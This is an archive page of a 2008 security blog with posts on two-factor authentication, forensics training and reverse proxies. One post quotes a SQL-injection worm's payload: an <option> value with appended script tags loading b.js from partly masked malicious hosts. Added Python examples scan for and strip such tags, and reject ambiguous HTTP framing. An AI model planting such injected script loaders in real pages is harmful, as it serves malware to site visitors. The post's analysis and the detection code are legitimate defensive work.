un-excogitate.org


No Excuses

If Blizzard is able to offer one-time password tokens for an MMORPG platform, then there is no longer any excuse for your financial institution not to offer the same, be it hardware (“fat”) tokens or SMS one-time codes.

I’ve had a couple of conversations about what happens when the baseline for user authentication is reset. I believe in the next year or so that milestone will be crossed, where the majority of online systems which provide access to PII or finance data will have either authentication-level, or even transaction-level, second factor authentication/authorisation.

For the baddies, this means that their modus operandi will have to evolve as well, and perhaps we’ll see an increase in sophisticated, real-time phishing sites, or smarter and targeted malware or man-in-the-middle-ware. There’s just too much money and information out there for the stealing, so I can’t see them simply packing up their bags and calling it quits. It’ll be interesting to see what happens next.

Posted by Christian Posted in: General 1 Comment » 29 June 2008


That’s What I Want

It started with the online purchasing of movie tickets
Since I’ve been running with the NoScript addon within Firefox I’ve found that pages trying to load remote scripts have become much more noticeable. This was particularly the case when, over a month ago, I was purchasing tickets online through one of our local Australian cinema chains (Greater Union) and I ended up on the help page. In this instance I had already temporarily allowed the primary site in NoScript so I could purchase the tickets (the site needed this functionality to work), but when the help page loaded NoScript advised me that there were another 6 domains with scripts that wanted to run. When I clicked the NoScript button at least 4 of those other domains did not appear legitimate, such as bin###.com, adw*.com, app##.com.

At the time I didn’t think much of this event and simply closed the help page and continued purchasing my tickets. I was in a rush of course and had to get to the movies to see Iron Man or something. A few days later I checked the page again and this time noticed that the scripts appeared to be pointing to different domains. When reviewing the HTML source it also became apparent that the JavaScript calls were not likely to be legitimate, as they seemed to have been appended inside ad-hoc <option> tags. For example:

<option value='cinebuzz_club#Cinebuzz Club<script src=http://www.hl***.com/b.js></script><script src=http://www.bin###.com/b.js></script><script src=http://www.apps##.com/b.js></script><script src=http://www.app##.com/b.js></script>'>Cinebuzz Club

The SQL Injection Worm
A quick Google search for “b.js” returned a number of hits, but the article that provided the most information was the SANS Diary on “SQL Injection: More of the Same”. The first reported instance of this SQL injection worm appears to have been the SANS report in May. The original summary of the vulnerability, as seen here, describes the JavaScript as opening a hidden iframe, which in turn opens other iframes (depending on your browser), eventually trying to download or execute a malicious piece of software.

The current incarnation appears to be a little more advanced: the malicious domains hosting the b.js file appear to be fast-flux hosted, as written up here, and the content within the subsequent hidden iframe is obfuscated JavaScript (yay). But using the technique described here (in fact the obfuscated JavaScript looked really similar) with Mozilla’s Rhino, the script eventually exposed the following logic:

I haven’t had much luck in getting the target website to produce anything other than an HTTP 500 response, but I’m assuming that depending on the parameter passed to index.cgi the server then spews out a different exploit or piece of malware.

The Problem
The primary concern I have with this piece of malicious JavaScript is the fact that Greater Union actively advertises and insists that their customers use the online channel for purchasing tickets. In fact, they’ve made it increasingly difficult to purchase tickets at the cinema itself, because you then lose the ability to choose your seats. The only way to guarantee particular seats is to buy your tickets online. So we’re stuck in a situation where we are encouraged to purchase tickets online, which of course requires submitting credit card information, while other portions of the website are hosting malicious JavaScript injected through an underlying SQL injection vulnerability. How do we know that the ticket-purchasing portion of the website doesn’t have similar vulnerabilities? The short answer is we don’t.

What exacerbates this is the fact that it’s been over a month and the vulnerability has not been fixed. In fact, if the target domains keep on changing, it implies that the site keeps on getting exploited. The “baddies” are updating their code, updating the malicious payloads, and are re-exploiting this site over and over again. This certainly impacts upon my trust in them as a provider to keep my personal information and credit card information protected. If their site is susceptible to a SQL injection worm, then someone doing targeted hacking against the site is likely to uncover all sorts of information.
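As an added example (not code from the original post, nor from the site in question): a small Python scan that walks stored text values for appended <script src=...></script> fragments of the same shape as the <option> value shown above, reports the hosting domains so that a change between scans (the re-exploitation described here) is visible, and strips the tags from a value. The table rows and domains are constructed placeholders.

```python
import re

# Constructed sample rows standing in for text columns pulled from a web
# application's database after a mass SQL-injection worm has run. The domains
# are placeholders (.test), not the ones observed on the real site.
SAMPLE_ROWS = [
    ("cinema_links", 1, "cinebuzz_club#Cinebuzz Club"
     "<script src=http://www.example-bad1.test/b.js></script>"
     "<script src=http://www.example-bad2.test/b.js></script>"),
    ("cinema_links", 2, "gift_cards#Gift Cards"),
    ("help_pages", 7, "Contact us<script src=http://www.example-bad3.test/b.js></script>"),
]

# The worm appends whole <script src=...></script> elements to existing text;
# the src is typically unquoted, so accept both quoted and bare forms.
SCRIPT_RE = re.compile(
    r"<script\s+src\s*=\s*['\"]?(?P<src>[^'\"\s>]+)['\"]?\s*>\s*</script\s*>",
    re.IGNORECASE,
)
HOST_RE = re.compile(r"^https?://([^/:]+)", re.IGNORECASE)


def find_injected_scripts(value):
    """Return the external hosts referenced by script tags embedded in a stored value."""
    hosts = []
    for m in SCRIPT_RE.finditer(value):
        h = HOST_RE.match(m.group("src"))
        if h:
            hosts.append(h.group(1).lower())
    return hosts


def clean_value(value):
    """Strip the appended script tags, leaving the legitimate text intact."""
    return SCRIPT_RE.sub("", value)


def scan_rows(rows):
    """Return (table, id, hosts) for every row carrying an injected script tag.

    Comparing the host list between two scans shows whether the payload
    domains are changing, which is the sign of repeated exploitation."""
    findings = []
    for table, row_id, value in rows:
        hosts = find_injected_scripts(value)
        if hosts:
            findings.append((table, row_id, sorted(set(hosts))))
    return findings


if __name__ == "__main__":
    for table, row_id, hosts in scan_rows(SAMPLE_ROWS):
        print(f"{table}#{row_id}: injected script hosts {hosts}")
```

Cleaning the rows removes the symptom only; the injection point itself still has to be found and fixed, or the next pass of the worm simply writes the tags back.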

What can we do?
To move this forward and offer some sort of assistance, a couple of things I would recommend if I were in their shoes would be:

Posted by Christian Posted in: Profession, Security 2 Comments » 28 June 2008


More Than Meets The Eye

Just read this article by Michael Farnum over on computerworld.com and I have to say, what a spectacular example of security through absurdity.

Posted by Christian Posted in: General, Security No Comments » 3 June 2008


Telstra Malware at AusCERT and the Security Equals ‘No’ Dilemma

The past couple of weeks have been an absolute rollercoaster. Last week was fairly hectic, with a number of our guys attending AusCERT, and then this week was a combination of busy work and getting ill. I find making the decision to call in sick to be one of the more difficult decisions I have to make. Am I actually sick enough not to go to work? Will I make myself much sicker if I just muscle through it? Will I make other people sick? I’m always of two minds with this issue. This instance was probably a bit easier, as on the Tuesday night I was waking up every hour or so with head and body aches, so making the call on the Wednesday was really simple.

One of the interesting items that came out of AusCERT that had us all talking, and scratching our heads wondering why popular press weren’t getting into it, was the news that Telstra accidentally distributed malware on USB thumb drives (and here) they were handing out. I guess popular media has more important things to talk about. I know it certainly makes you question whether or not you’d want to use them for security services. Of course, I understand that chances are this was a sales/marketing mistake and so doesn’t necessarily highlight the professionalism of the Telstra security folk.

Another interesting entry I read this week (or was it last week? My memory’s still a little shattered from the cold/flu) was Kees Leune’s post on Never say ‘no’. Kees talks about the all too common situation where security people are seen as the ‘no’ people (thought police, policy nazis, project killers, whatever). More often than not this is actually a perception problem. If the security person is doing their job right they should not be saying no; they should be identifying and highlighting risk. It’s the owners of the risk who are the people saying no, not the people identifying the risk. Usually risk assessors are positioned in such a way that they can’t even own a risk, so for them to be saying no would imply some break in the risk management framework.

I can definitely relate to this problem, and further believe that once your department has developed that reputation it is a very difficult thing to change. It’s not just a name change that will fix it; it’s almost an entire culture change that has to occur. I’m not completely sure I understand the answer to the problem; it falls into the bucket of ‘you just have to keep on working hard at it.’

Posted by Christian Posted in: Computers, Profession, Security No Comments » 30 May 2008


The Power of Design to Fight Crime

Just read this article over on core77 summarising an event held by the UK Design Council which collected forty leading technology designers and manufacturers plus a group of young people to discuss “new ways of harnessing the power of design to protect young people from crime - particularly theft of ‘hot products’ like mobile phones and MP3 players.” This event was conceived after the Design Council released some stats that show that the majority of 11-16 year olds in England carry a gadget with them at some point and that one in eight have been the victim of ‘hot product’ theft in the past three years. I believe ‘hot product’ theft is where the product is stolen from them whilst they’re still using it, such as on the mobile (cell) phone, or listening to an iPod.

Core77’s excerpt provides the most concise overview:

The focus is on generating innovative design briefs which offer a clear business opportunity for manufacturers who will be encouraged to develop them into the next generation of crime-safe gadgets. [...] Home Secretary Jacqui Smith said:

“I am delighted that so many of our best designers have contributed their time and expertise to today’s event and I look forward to seeing genuinely new and commercially viable products flow from it. The role that good design can play in cutting crime is well established but success depends on effective partnerships between Government, the police and the design industry.”

At first I didn’t quite understand what they meant by utilising “design” to prevent crime, believing that it was more centred on architecture, such as developing city spaces which discourage crime. But after skimming this article it started to make sense. Richard Farson explains this concept by discussing the power of design:

Design achieves its power because it can create situations, and a situation is more determining of what people will actually do than is personality, character, habit, genetics, unconscious motives or any other aspect of our individual makeup. Nobody smokes in church, no matter how addicted.

Recently, the design disciplines have received research attention indicating that the physical environments designers create may have positive effects never before realized, potentially reducing all of the measures of despair. For example, studies show that if children grow up in a home designed to permit a view of greenery, they are less likely to turn to addiction and crime and more likely to achieve in school. Such thoughtfully designed environments can reduce the frequency of divorce and other signs of family dysfunction. It is no longer far-fetched to predict that intelligent design will help prevent mental and physical illness, child abuse and suicide.

Richard also explains that this design power also has a ‘dark side’:

Because it is so powerful, design also has a dark underside. If mindlessly conceived or corrupted, design can produce depressing consequences. The design of cities that plan giant shopping centers can erode traditional communities by forcing neighborhood businesses to close. Massive highway construction can divide and rupture a neighborhood. Kafkaesque office designs of row after row of monitored employees, or maze-like cubicles, can dehumanize. Graphic designs in advertising can be dangerously misleading, promoting unhealthy products or unworthy candidates. Some designers think these bad designs greatly outnumber the good ones.

I believe that a lot of these principles map to web application security principles as well. At a high level it’s easy to relate the concept that a mindlessly conceived or corrupted design of a web application will have an impact upon how many vulnerabilities it has. In addition, the design of a web application, either through its presentation layer or, more subtly, through the way that business logic is represented in HTML (for example), can also create a false impression that the system is secure. A good example is a traditional design firm promoting the security of their applications because they utilise SSL/TLS to encrypt the site, when SSL may be good for protecting data in transit but does nothing to prevent vulnerabilities such as XSS or CSRF.

On a deeper level, such as taking into account what the Internet provides for crime, I think the principles still align as well. If it wasn’t trivial to perpetrate crime remotely, anonymously and on such a large scale would it be so prevalent? Probably not. The Internet was not initially designed with a security hat on so of course it’s insecure at a low level.

Posted by Christian Posted in: Computers, Security, Web Development No Comments » 18 May 2008


Web Server vs Reverse Proxy

Whilst being a member for over a year, I think this is the first time I’ve mentioned the Security Catalyst Community forum. Whilst not much of a frequent poster, I do find myself going back there almost daily to catch up on discussions that people are having that might be relevant to me either personally or professionally. The forum was started by Michael Santarcangelo over at SecurityCatalyst.com, and over the period that I’ve been following the forum the number of users actively participating certainly has been growing.

The reason I wanted to write about it today was primarily driven by a recent thread on the forum about “Web Server VS Reverse Proxy” (by David Stern) that mirrored conversations that I was also having with colleagues on:

“What exactly are the controls that reverse proxies provide to a 3-tier web application?”

The thread seemed to echo what we were talking about at work, so I was pleased to see the general acknowledgement that the actual control provided by a reverse proxy is more about introducing another layer between the data and the client, and that the consensus seemed to be that this control is actually quite weak, especially as most run-of-the-mill reverse proxies would not help mitigate web-application-level risks such as information disclosure or SQL injection.

Another comment (thank you Kees Leune) highlighted that traditionally, reverse proxies were designed to provide non-security functions, such as load-balancing, SSL offloading or aggregating your web presence through a single point (potentially to simplify your logging?). Of course, the point that really jumped out at me was from Michael Dickey, who mentioned the down-side to reverse proxies, due to the way in which “they may not interpret it the same way a web server will. This can give rise to fun request smuggling attacks or other cache poisoning issues.”
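An added example, not from the forum thread or any of the people quoted: a Python check of the kind a strict front end (reverse proxy) should apply before forwarding a request, rejecting any message whose body length could be read two different ways, since that disagreement between proxy and web server is exactly what request smuggling depends on. The requests below are constructed samples.

```python
# Constructed sample requests; none of them is taken from real traffic.
REQUESTS = {
    "plain": b"POST /buy HTTP/1.1\r\nHost: example.test\r\nContent-Length: 5\r\n\r\nhello",
    "chunked": b"POST /buy HTTP/1.1\r\nHost: example.test\r\n"
               b"Transfer-Encoding: chunked\r\n\r\n0\r\n\r\n",
    "cl_and_te": b"POST /buy HTTP/1.1\r\nHost: example.test\r\nContent-Length: 5\r\n"
                 b"Transfer-Encoding: chunked\r\n\r\n0\r\n\r\n",
    "dup_cl": b"POST /buy HTTP/1.1\r\nHost: example.test\r\n"
              b"Content-Length: 5\r\nContent-Length: 9\r\n\r\nhello",
    "odd_te": b"POST /buy HTTP/1.1\r\nHost: example.test\r\nTransfer-Encoding: xchunked\r\n\r\n",
}


def parse_headers(raw):
    """Split a raw request into (request line, [(name, value)], body).
    Header names with surrounding whitespace are rejected outright, as servers
    differ on whether 'Content-Length :' names a real header."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    request_line = lines[0].decode("ascii", "replace")
    headers = []
    for line in lines[1:]:
        name, sep, value = line.partition(b":")
        if not sep or not name or name != name.strip():
            raise ValueError("malformed header line: %r" % line)
        headers.append((name.decode("ascii", "replace").lower(),
                        value.strip().decode("ascii", "replace")))
    return request_line, headers, body


def classify_framing(raw):
    """Return ("accept", reason) or ("reject", reason) for the message framing.
    Anything that leaves the body length open to interpretation is rejected so
    that the proxy and the origin server can never disagree on where it ends."""
    try:
        _, headers, _ = parse_headers(raw)
    except ValueError as exc:
        return "reject", str(exc)
    cl = [v for n, v in headers if n == "content-length"]
    te = [v for n, v in headers if n == "transfer-encoding"]
    if cl and te:
        return "reject", "both Content-Length and Transfer-Encoding present"
    if len(cl) > 1:
        return "reject", "multiple Content-Length headers"
    if cl and not cl[0].isdigit():
        return "reject", "non-numeric Content-Length"
    if te:
        # Only a lone, exactly spelled 'chunked' is accepted; variants such as
        # 'xchunked' or 'chunked, identity' are parsed differently by different servers.
        codings = [c.strip().lower() for c in ",".join(te).split(",")]
        if codings != ["chunked"]:
            return "reject", "unsupported Transfer-Encoding: %s" % ", ".join(te)
        return "accept", "chunked body"
    return "accept", ("Content-Length body" if cl else "no body")


if __name__ == "__main__":
    for name, raw in REQUESTS.items():
        print(name, classify_framing(raw))
```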

I would highly recommend anyone involved with information security sign up to the forum as I think it’s an invaluable resource. Even if a topic only comes up occasionally that has relevance to you it’s definitely worthwhile.

Posted by Christian Posted in: General No Comments » 10 May 2008


Forensic Acquisition Training

I was fortunate enough to attend a two-day crash course on forensic image acquisition last week. The trainer was Phillip Russo from CIA Solutions, whilst a local Perth boy he spends a huge amount of his time running training elsewhere around the world. The course covered the basics of forensic acquisition, traditional investigation skills and computer crime, integrity tools (hashing), checklists, chain of custody, to shutdown or not shutdown, dead versus live forensics, media types, write blockers (software versus hardware), imaging and image types, and a summary of tools.

One of the highlights for me personally was having the opportunity to discuss more of the court room and legal aspects of presenting evidence, as Phillip had a history of presenting in court in a number of different contexts. I think it was through this experience that he had developed methods of dissecting fairly difficult concepts, so much so that I imagine even the mums and dads out there could understand. A good example is the concept of file slack. Whilst I may have a fairly good understanding of what file slack is, trying to explain it to people who don’t have any history or experience with computer forensics, even savvy IT people, can be a fairly daunting task. Combine this with trying to explain how hard drives, partitions and file systems work and you certainly have a fairly large task in front of you.
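As an added illustration of file slack (my own example, not material from the course): a Python model of a disk with an assumed 4096-byte cluster size, showing that a 5000-byte file allocated two clusters leaves 3192 bytes of slack in its last cluster, and that whatever the previous occupant of that cluster wrote there survives and can be read back.

```python
CLUSTER_SIZE = 4096  # assumed allocation unit; real values depend on the file system


def make_disk(n_clusters):
    """A blank disk: n_clusters clusters of zero bytes."""
    return bytearray(CLUSTER_SIZE * n_clusters)


def clusters_needed(size):
    """Whole clusters a file of this size occupies (ceiling division)."""
    return -(-size // CLUSTER_SIZE)


def slack_size(file_size):
    """Bytes allocated to the file but not used by its content."""
    return clusters_needed(file_size) * CLUSTER_SIZE - file_size


def write_file(disk, start_cluster, data):
    """Write a file starting at a cluster boundary. Only the file's own bytes are
    written; the remainder of its last cluster is left exactly as it was."""
    off = start_cluster * CLUSTER_SIZE
    disk[off:off + len(data)] = data
    return clusters_needed(len(data))


def slack_region(disk, start_cluster, file_size):
    """Return the slack bytes sitting after the file's content in its last cluster."""
    start = start_cluster * CLUSTER_SIZE + file_size
    end = start_cluster * CLUSTER_SIZE + clusters_needed(file_size) * CLUSTER_SIZE
    return bytes(disk[start:end])


def demo():
    """Old file fills two clusters and is 'deleted'; a smaller new file reuses them.
    Returns (slack length, slack bytes) for the new file."""
    disk = make_disk(4)
    # Step 1: an older file occupies clusters 0-1 completely. Deleting it only
    # unlinks the name; the data stays on disk. (Constructed content.)
    old = (b"OLD CONFIDENTIAL MEMO " * 400)[:2 * CLUSTER_SIZE]
    write_file(disk, 0, old)
    # Step 2: a new 5000-byte file is allocated the same two clusters.
    new = b"N" * 5000
    write_file(disk, 0, new)
    slack = slack_region(disk, 0, len(new))
    return len(slack), slack


if __name__ == "__main__":
    length, slack = demo()
    print("slack bytes:", length)
    print("first bytes of slack:", slack[:40])
```

Reading the file through the file system returns only its 5000 bytes; the 3192 bytes of slack are only visible to a tool that reads the raw clusters, which is why an image of the whole medium, not a copy of the files, is what gets acquired.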

Another highlight was the opportunity, not only to get hands on with hardware write blockers and AccessData’s FTK Imager, but also to combine this with real life scenarios and the process of documentation. Due to studying computer forensics at University I was fairly comfortable with the technical process of data acquisition, but combining this with the realistic process of documenting the acquisition, including chain of custody forms, was quite interesting and surprisingly difficult to do effectively.

The question was raised whether, if all the forms were transitioned into digital form, they would still be admissible in court. Whilst the concept could not be completely discounted, the fact that such records are not ‘tangible’ seemed to be quite an important factor for court room presentation. Judges and juries seem to have a better grasp of concepts when they can see the evidence in front of them. This certainly made sense to me, and obviously relates quite closely to the KISS principle. I think this also makes sense for this type of environment, probably more so than applying it to web application development for example, as you are already bombarding people with foreign and complex concepts, let alone trying to explain to them the principles of digital signatures on your ‘running sheet’ as opposed to your hand-written notes.

Overall a worthwhile 2 days, and whilst it whetted my appetite for further training in forensic analysis, I’ll just have to leave that for another day.

Posted by Christian Posted in: Computers, Forensics, Profession, Security No Comments » 6 May 2008


Sub Rosa

Whilst I certainly don’t claim to be much of a literary critic or expert, I found the semantics behind yesterday’s word of the day to be really interesting, especially due to its ties with security.

sub rosa \suhb-ROH-zuh\, adverb:
1. Secretly; privately; confidentially.

adjective:
1. Designed to be secret or confidential; secretive; private.

Further investigation (Wiki) highlighted the history behind the Latin term, which means ‘under the rose’, and how its current understanding in English has come to mean secrecy or confidentiality:

The rose was the emblem of the god Horus in ancient Egypt. Later the Greeks and Romans regarded this as god of silence. This originates from a Greek/Roman misinterpretation of an Egyptian hieroglyphic adopting Horus along with Isis and Osiris as a god. The Greeks translated his Egyptian name Har-pa-khered to Harpocrates.

The rose’s connotation for secrecy also dates back to Greek mythology. Aphrodite gave a rose to her son Eros, the god of love; he, in turn, gave it to Harpocrates, the god of silence, to ensure that his mother’s indiscretions (or those of the gods in general, in other accounts) were kept under wraps. Paintings of roses on the ceilings of Roman banquet rooms were also a reminder that things said under the influence of wine (sub vino) should also remain sub rosa. In the Middle Ages a rose suspended from the ceiling of a council chamber similarly pledged all present (those under the rose) to secrecy.

In Christian symbology the phrase “sub rosa” has a special place in confessions. Pictures of five-leaved roses were often carved on confessionals, indicating that the conversations will maintain secrecy. The phrase has also been understood to make reference to the mysterious virginal conception of Christ, which will remain a secret to a rational mind.

In current times, the term is actually used by the Scottish Government for a specific type of “off the record” meetings.

In a number of European countries a “sub rosa” remark is deemed to imply sexual innuendo, or at the very least a blow below the belt. More recently, “sub rosa” activities have become a byword for covert operations, usually by security services. Originating primarily in the USA, this meaning has been gradually spreading to other countries and in particular the United Kingdom.

Posted by Christian Posted in: General, Security No Comments » 4 May 2008


Mitigating DoS with Employee Monitoring. What.

This article over on Computerworld Australia seems to have a couple of conflicting items that have been bugging me since I read it the other day. The article begins by mentioning potential changes to federal government legislation:

The changes will give employers power to intercept all Internet-based communications without consent, including e-mails and instant message (IM) discussions.

It’s at this point that all of sudden we go on a massive tangent, whereby the Attorney-General is saying that these legislative changes are a counter-terrorism measure, and that these changes could prevent breaches occurring:

…similar to the Estonian Denial of Service (DoS) attacks in which a 19 year-old hacker disabled the Web sites of banks, schools and the Prime Minister’s office.

Hopefully someone out there can explain to me exactly how granting employers monitoring rights over their employees is a control against denial of service attacks? Or even better, how exactly a denial of service attack equates to a breach? Especially after they’ve done such a good job of defining what an information security breach is in the “Draft Voluntary Information Security Breach Notification Guide”:

An information security breach occurs when personal information is exposed to unauthorised access, use, disclosure or modification as a result of a breach of an agency’s or organisation’s information security.

The only saving grace in the article was the comment from Nick Elsmore from SIFT where he states that these new laws will have minimal impact on businesses due to most enterprises having provisions for Internet monitoring within employee contracts. My experience in a few different enterprises has proven this to be the case.

Posted by Christian Posted in: General 2 Comments » 25 April 2008


Don’s Windows Incident Response Script

Just had a quick play with Don’s Windows Incident Response Script and am very happy that someone else has put in the time and effort for something as useful as this, and then provided it for all. Some of the useful information it captures includes:

So yeah, go check it out.

Posted by Christian Posted in: Computers, Forensics, Security No Comments » 19 April 2008

